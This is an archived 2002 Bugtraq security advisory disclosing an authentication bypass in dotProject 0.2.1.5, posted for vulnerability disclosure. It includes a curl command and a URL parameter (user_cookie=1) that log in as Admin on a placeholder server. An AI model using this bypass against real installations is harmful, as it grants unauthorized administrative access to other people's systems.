Bugtraq mailing list archives
php dotProject by pass authentication
From: pokleyzz <pokleyzz () scan-associates net>
Date: Mon, 29 Jul 2002 11:19:14 +0800
SCAN Associates Sdn Bhd Security Advisory Product: dotProject 0.2.1.5 (possibly other) Vendor URL: http://www.dotmarketing.org/dotproject/Summary: php dotProject by pass authentication
Author: pokleyzz <pokleyzz () scan-associates net>, sk <sk () scan-associates net>, shaharil <shaharil () scan-associates net> Description ===========dotProject is web base project management system . This application consider as beta version.
Details =======Everyone can bypass authentication and login as Admin. It was rather simple to exploit, user may send a crafted cookie like:
curl -b user_cookie=1 http://server/project/index.php?m=projects Or simply append user_cookie=1 in any URL: http://server/project/index.php?m=projects&user_cookie=1Vendor Response =============== Vendor has been contacted on 24/7/2002 but no reply.
www.scan-associates.net <http://www.scan-associates.net>
Current thread:
- php dotProject by pass authentication pokleyzz (Jul 29)